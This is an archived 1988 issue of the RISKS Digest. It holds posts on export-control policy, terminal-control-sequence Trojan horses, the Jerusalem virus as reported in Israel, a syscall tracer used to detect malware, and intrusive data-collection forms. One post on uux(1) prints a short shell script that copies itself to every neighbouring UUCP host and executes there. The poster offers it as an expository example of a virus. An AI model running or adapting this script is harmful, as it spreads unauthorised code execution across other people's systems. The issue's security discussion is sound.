The Risks Digest

The RISKS Digest

Forum on Risks to the Public in Computers and Related Systems

ACM Committee on Computers and Public Policy, Peter G. Neumann, moderator

Volume 6 Issue 12

Friday, 22 January 1988


o Risks in technology transfer policy
Alan Wexelblat
o Trojan-horsed smart terminals?
Tim McDaniel
o The virus reaches Israel
Martin Minow
o Checking for Trojan Horses and Viruses
Dennis L. Mumaugh
o RISKS of uux(1) and trusting remote hosts
o Sheep, Goats, and responding to computer-generated requests
Martin Smith
o Proposal for Fault Tolerance Newsgroup
Don Lee
o Info on RISKS (comp.risks)

Risks in technology transfer policy

Alan Wexelblat <wex%SW.MCC.COM@MCC.COM>
Tue, 19 Jan 88 14:48:17 CST
One of the RISKS of technology is in attempts to control it.  For the last
seven years, the Reagan Administration has adopted an increasingly
restrictive export licensing policy, aimed at reducing what they see as a
problem of excessive technology transfer to East bloc countries.  However,
this policy and its implementation have their own risks.  Recently, a
National Academy of Sciences panel criticized the policy as "not generally
perceived as rational, credible and predictable."

One victim of this policy is Columbus Instruments, a small company located
in Columbus, Ohio, which specializes in equipment used with animals in
medical research labs.  In June 1985, Dr. Jan Czekajewski, president of the
company, shipped $228,000 worth of lab-animal research equipment to a
medical symposium in Moscow.  Included in the shipment were 5 personal
computers, including a Taiwan-made PC-XT clone.  Dr. Czekajewski didn't
think he needed an export license.

Under the Pentagon's Project Exodus, which was set up to stop shipment of
strategic items to the Soviet bloc, US Customs agents seized the equipment
at Kennedy Airport, descended on Czekajewski's offices, confiscated his
files and notified television stations of the "critical leak of militarily
sensitive technology" narrowly averted by the Customs Service.

Czekajewski went to Eastern Europe to check the availability of microcomputers.
He found the IBM PC-XT and AT computers available in Poland and in Bulgaria he
bought a locally-made PC clone.  After taking it back to Ohio, he discovered
that he would need an export license to ship it back to Bulgaria!

Two and a half years after the original raid, Czekajewski still doesn't have
all his equipment back, and his battles with Customs and the Pentagon have cost
him several hundred thousand dollars in legal fees, time, energy, and lost

Another victim is Alan Kay.  He was invited by Gosplan, the Soviet central
planning agency, to give a seminar in Moscow and describe how Gosplan could
become more market-oriented.  He wrote to the US Commerce Department and asked
if any license was needed in order to describe software that he had designed
which was commercially available in the US.  He got a letter from Dan Haydosh,
then acting director of the Office of Technology and Policy Analysis,
indicating that the seminar would require an export license since it "presents
a significant risk to our national security."

Readers of the space digest know that many American companies are hurting
because of the lack of launchers for commercial satellites; yet the government
won't allow them to launch on Soviet rockets.  Communications and weather
tracking are both suffering as aging satellites break and can't be repaired or

According to the National Academy of Sciences, the Reagan administration
crackdown has essentially failed and is costing the US economy over $9 billion
a year in lost trade.  I frankly don't expect this to get better anytime
sooner.  Comments?

--Alan Wexelblat
UUCP: {harvard, gatech, pyramid, &c.}!sally!im4u!milano!wex

Trojan-horsed smart terminals?

Tim McDaniel <>
Wed, 13 Jan 88 01:56:08 CST
We just brought up BSD 4.3 (!) on our Vax.  "finger" has been changed, so
that a control character control-x is printed as "^X".  (Actually, it
doesn't come close to doing that, but that's beside the point.)  The list of
changes for 4.3 says that this was done to prevent Trojan horses.  I assume
that this refers to sending control sequences to very "smart" terminals.

Tim McDaniel, Center for Supercomputing Research and Development
at the University of Illinois at Urbana-Champaign

Internet, BITNET:
UUCP:    {ihnp4,uunet,convex}!uiucuxc!uicsrd!mcdaniel
CSNET:   mcdaniel%uicsrd@uiuc.csnet

    [The bug of squirrelled CTL and ESC sequences was mentioned long ago in
    RISKS, and presumably has been fixed in most sensible systems!  Of course, 
    it still may lurk in non-mail contexts — including FINGERing someone's 
    Troajn PLAN.  The FINGER vulnerability has not been mentioned explicitly, 
    but is implicit in the earlier discussions.  It is truly a Trojan horse, 
    and even nastier than one contained in received mail — it is triggered 
    by curiosity on the part of the victim without action on the part of the

    By the way, the Christmas Tree "virus" (RISKS-5.79 ff.) is of course 
    really a Trojan horse with an embedded virus.  The ARF-ARF PC Graphics 
    Trojan horse was also noted a while back.  PGN]

The virus reaches Israel [See RISKS-6.6]

Martin Minow THUNDR::MINOW ML3-5/U26 223-9922 <>
16 Jan 88 12:00
With Nitsan Duvduvani's ( permission, I'm
enclosing an article from an Israeli newspaper on the infamous virus.  The
article is translated by Nitsan, and was sent to me by Aharon Goldman
(  I've lightly copy-edited it.  Martin Minow

 [The following is translated from an article that appeared on "Maariv" (one
  of Israel's most popular daily newspapers) in 8-Jan-1988. I translated it
  myself, so I apologize for the poor style. My own comments appear in brackets
  '[]' within the translated text - Nitsan Duvduvani]

              'BEWARE OF FRIDAY THE 13-TH OF MAY'

    The Hebrew University [in Jerusalem] published this warning
    yesterday, as on the above date the virus may destroy any
    information found in the computer's memory or on the disks.
    Immunization programs are distributed to locate the virus and
    exterminate it.

        by Tal Shahaf

The computer virus that got the nickname "the Israeli Virus" continues to run
wild. The Hebrew University in Jerusalem spread the warning yesterday: Don't
use your computer on Friday, the 13-th of May this year! On this day the virus
was programmed to wake up from its hibernation - and destroy any information
found in the computer memory or on the disks. Because of this reason, it also
got the nickname "time bomb". Moreover, every 13-th of each month, the virus
will cause a significant slow-down in the computer's response.

Evidences were received by Maariv yesterday for the existence of the virus in
many other places in addition to the Hebrew University in Jerusalem. It was
also reported to be detected in one of the I.D.F. [Israeli Defense Forces]
units using personal computers. Other messages mentioned some commercial
companies where the virus had been detected. An owner of a software house from
Tel-Aviv, who asked to remain anonymous, told that the malfunctions were
detected in software kits that were bought with the computers and were
installed by the selling company.

Eli Shapira, an owner of a computer store from Haifa, tells about infected
software kits that arrived at him from people in the area. The virus also
infected a computer in his store, and possibly spread to customers who had
bought software kits. According to him there was a thorough disinfection
activity that cleared the computer and the diskettes in the store.

Computer experts warn that the virus may now be in any software and in any
computer, including those purchased in computer stores.

Currently, the Hebrew University distributes immunization programs that can
detect the virus in the computer's memory and exterminate it. A new problem
popped up though: A mutation of the virus may show up, a few times as dangerous
as the current virus. It all depends on the source of the virus and whether
the person responsible for it is some computer wizard who did it for fun or
some psychopath who does not control his actions.


    The immunization programs fit only the virus from Jerusalem.
    Stopping of unauthorized software copying phenomenon is expected.

        by Tal Shahaf

The model that fits the best the spreading of the computerized virus is the
AIDS virus, so claim computer staff. The resemblance is in all dimensions. The
spreading rate of the virus is amazing. A single infected diskette is
sufficient for infecting thousands of personal computers. It is passed by
diskettes going between computers, and also by telephone communication between
computers. Yesterday it was found out that the virus was much wider spread than
what was thought.

Because of this reason, users are warned not to receive diskettes from unknown
source. First precaution: not to use diskettes without the "computerized
condom": a little sticker that prevents any damage to the information on the

The computer community is grateful for stopping the process of unauthorized
copying of software that reached incredible use lately. Exactly like AIDS, that
generated the safe sex phenomenon, the computerized virus is about to generate
the phenomenon of decent use only of software.

The phenomenon of growing infected software was discovered yesterday as a side
effect only. The real damage is the time bomb hidden: Every 13-th of each
month, the virus will cause significant slow down in the computer response, and
in 13-th of May this year it will erase all the information in the computer.

Yuval Rahavi, the computer expert from Jerusalem who discovered the vicious
virus, explains that it is a small and sophisticated computer program. When
the computer is turned on, the program is loaded into the computer memory, and
from now on, any program invoked is contaminated. When the virus identifies
a new program, it joins it without disturbing its activity. From now on, any
use of this software, transferring it to other user, will spread the virus.

The temporary solution to the problem is the immunization programs written by
Rahavi. One is used to detect the virus and the other for prevention. It is
loaded into the computer memory before any other software. If the virus then
attempts to reside in the memory, the program will give appropriate warning.
People from the Hebrew University distributed information that described the
virus for all the computer users at the universities, joined with copies of the
immunization programs.

Ofer Ahituv, an owner of a software house, thinks the source for the virus is
in one of the software houses which became involved with his programmers.
According to him, all his software kits will now be distributed carrying a
label specifying they were checked and found clean of any virus.

The possibility of a new virus, which is more dangerous, scares computer
people.  Such a virus may harm the information, erase it slowly in such a
way that is not detectable. This way, accountants may find out all their
clients accounting data has been erased, banks will lose their customers
data, stores - their cash register data.

The immunization programs are good for fighting the current virus. If a new
virus pops up - these immunizations will be worthless.

Ezra Ben-Kohav, chairman of the computer organization I.O.I.P. [Israeli
Organization for Information Processing] told Maariv yesterday: "There is no
law that defined such action as crime. If the author is caught, there will be
nothing to blame him/her for."

Arie Bender gives the following message: A search team was established in the
Hebrew University, which includes Hilel Bar-Dayan, Amiram Ofir, Eli Peled and
Elisha Ben-Ezra. People in the university asked yesterday to make clear there
was no information or suspicion about the creators of the virus, including
students of the Talpiot program [a special program for young students that
combines army studying].


Yossi Gil, from the computer people who discovered the virus, suggests several
defense activities for the computer users who receive a new diskette and want
to check it.

1. During the check, activate the computer without a hard disk that may be
   infected by the virus.
2. Use diskettes that carry no important information/programs.
3. Invoke the checked software with a diskette protected by a sticker.
4. Invoke the software again with a diskette without a sticker.
5. Compare the two diskettes using a compare program. If no differences are
   found, you may assume the checked diskette is free of the virus.
6. Another rule which is always important: Prepare a copy of any important
   diskette, and specify the date when the copy was done. If the virus attacks
   your computer, you will be able to restore the damaged programs from these
   copies.  (by Tal Shahaf)


The "Israeli virus" was detected, after causing much damage, also in the
educational center of the ministry of education in Rotenberg building on the
Carmel [mountain in Haifa]. There is a computer project going on this site, in
which tens of students participate. The center manager, Gideon Goldstein, and
the project people Michael Hazan and Gadi Kats, told that 6 weeks ago there was
a virus discovered, which destroyed 15 thousand dollars worth of software and 2
disks in which 7000 hours of work had been invested, in an irrecoverable way.
(by Reuven Ben-Zvi)


The Israeli virus panic moved from within the campus and spread out also to the
computer consumers in Jerusalem. In many stores there were customers reporting
symptoms in their home computers, that matched those which had been found in
the P.C. systems in the university. "This morning we ran into and heard about a
few cases", told Emanuel Marinsky, manager of computer services lab, "It raises
panic".  (by Arie Bender)

Checking for Trojan Horses and Viruses — a partial solution

Thu, 7 Jan 88 18:02:04 est
In the latest discussions there has been some thought as to how to prevent
viruses and Trojan horses ...

I am now using an internal product called "truss" that inolves the "proc"
file system of UNIX Version 8 (and other developemental versions).

Truss is a system call tracer.  It allows one to examine any process and
observe all system calls.  It lists the system call, and the arguments.
This is done intelligently with translations of arguments to strings and
human format data.  It also gives the return value of the call and
translates error codes into symbolics.  With this product one can watch the
behavior of a program and observe what it does (in a gross level) and who or
what it operates on.

Truss is able to handle the fork/exec of UNIX and follow the children
processes (limited recursion).  Thus one can attach truss to a login shell
and watch a terminal session of a suspect.

Also truss can attach to a process under execution and not related to the
initiator.  Truss can also freeze the process in its tracks and allow
another product (a debugger) more initimate access to the errant process.

The utility as a systems security device AFTER inital suspicion is raised is
obvious.  The RISK?  Applying this to MY operations.  After all who is to
determine what a virus is?

Dennis L. Mumaugh
Lisle, IL       ...!{attunix,ihnp4,cbosgd,lll-crg}!cuuxb!dlm

     [There is also the problem of locking the barn door after the 
     Trojan horse has escaped.  Baled out?  A Trojan cake hidden in a
     file instead of a file hidden in the cake?  PGN]

RISKS of uux(1) and trusting remote hosts

Wed, 6 Jan 88 23:37:55 GMT
There has been much talk recently about viruses and other malevolent
programs.  I will add just one more to the discussion.  It is well known
that the UNIX operating system is not very secure — it is also well known
that there are many thousands of UNIX machines in place.

The following program owes its operation to the uucp(1) and uux(1) commands.
On most sane systems, the execution of commands using uux is restricted.
But, by contacting every system known to the current host, it is very likely
that some of the system managers have forgotten to plug this simple hole.
There are similar holes that command restriction does not plug, but it would
be a mistake to illucidate further.

I do not advocate that you execute the following program.  It is meant for
expository puposes only.  However, it does not contain any harmful commands
except perhaps that it could flood the network indefinitely.

In closing I would remind everyone that when you connect one machine to
another there is a degree of trust involved.  Many a system has been un-done
by trusting an untrustworthy system — a simple example would be a faculty
machine connected to a machine accessible to students and have the student
machine mentioned in the /etc/hosts.equiv file.

-- CUT --

# A very simple virus.
for x in `uuname`
    uucp -C /tmp/virus $x\!/tmp/virus
    uux $x\!"sh -c /tmp/virus"
rm -f /tmp/virus

Sheep, Goats, and responding to computer-generated requests

MartinSm <mcvax!!MartinSm@uunet.UU.NET>
17 Jan 1988 20:38:14 GMT
I don't know how these things work in America but over here forms are sent
out each year to register to vote in elections and by law they *MUST* be
completed. This year another form was sent out in the same envelope, computer
printed and requesting information such as the number of people in the house
of 'Ethnic Origin' or Unemployed or Disabled. Nowhere on the form did it say
that it was nothing to do with the electoral register and had no legal status.
It had been issued by our local council (Leeds) and contained a suspicious
looking code number in the corner which could be used to discover which
household had filled it in. Though no address was printed which would have made
this obvious.

Naturally the form went in the bin immediately. A couple of weeks later a
letter arrived saying in essence that we had been *RANDOMLY* chosen from
a *SMALL* number of people who were being uncooperative. We were to be
visited by someone who was going to get us to fill it in. As yet this has
not occurred but if it does they are not getting past the door.

The situation becomes more interesting when you know that there was a scandal
involving council officers writing to department heads and asking for their 
master passwords. This information was usually provided, on the pre-printed
form, without question.

This is the "sheep" factor again. It seems to be becoming increasingly common
for people to request information for nefarious, nonessential or unexplained
reasons. I think we have a lot to worry about. Especially in a country like the
UK where it is much easier to put data into officials' hands than to get it 
out of them.

Martin Smith, Langwith College, University Of York, 
Heslington, York, YO1 5DD England

Proposal for Fault Tolerance Newsgroup

Don Lee <trwrb!>
5 Jan 88 21:41:00 GMT
     I would like to propose the formation of a new newsgroup,
comp.fault_tolerance, that would discuss technical issues releated to fault
tolerance.  Such a newsgroup is needed, since there is no current newsgroup
that discusses the technical issues involved in fault-tolerant computing.
Fault tolerance is an extremely diversified area of computing that is not only
concerned with hardware and software, but also with, to name a few,
interconnection networks, real-time systems, parallel and alternative
architectures, and data base systems.  Issues also involve modeling (including
automated reliability models such as CARE III, HARP, ARIES, and CRAFTS)
and simulation of fault-tolerant systems.  Since fault-tolerant computing is
such a diversified area it is easy to imagine that such a large volume of
articles would be posted that the average reader would have a difficult time
keeping up.  Therefore, the newsgroup should be moderated.  I am willing to be
the group moderator.

     If anyone has any comments regarding the name and nature of the group
please post them to news.groups.  I will answer them as soon as possible.
Please send any votes for or against the group to me personally.  I hope that
the group will be formed very shortly, and I look forward to the interesting
and informative articles that I am sure will be posted to comp.fault_tolerance.

 Thank you,  Don Lee

Please report problems with the web pages to the maintainer